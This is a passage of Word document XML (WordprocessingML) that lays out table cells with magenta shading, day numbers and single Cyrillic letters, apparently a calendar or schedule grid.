            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="81"/>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Н</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="71"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="71"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>О</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360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>8</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16</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left="4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28</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21</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14</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color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="2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8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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>16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20</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42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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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20" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="12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Я</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="4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240" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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6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30</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color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>25</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color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>30</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23</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13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20</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Н</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="14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А</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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2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340" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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32</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8</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highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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260" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>31</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32</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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="180"/>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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="10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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="228"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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60" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="20"/>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228" w:lineRule="exact"/>
              <w:ind w:left="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="60"/>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228" w:lineRule="exact"/>
              <w:ind w:right="60"/>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228" w:lineRule="exac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228" w:lineRule="exact"/>
              <w:ind w:left="20"/>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380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>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200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>27</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228" w:lineRule="exac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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="2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60" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="2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20" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="8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6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228" w:lineRule="exact"/>
              <w:ind w:left="100"/>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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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20</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12</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19</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33</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34</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200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>12</w:t>
            </w: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16</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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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24</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16</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3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="73"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="73"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>15</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33</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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26</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16</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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>26</w:t>
            </w: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20</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12</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33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6</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15</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14</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420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="160"/>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360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>13</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20" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="18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Ч</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Т</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О</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120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="76"/>
                <w:sz w:val="10"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="76"/>
                <w:sz w:val="10"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>И</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="100" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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32</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highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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13</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11</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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>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26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="180"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>13</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340" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="211"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
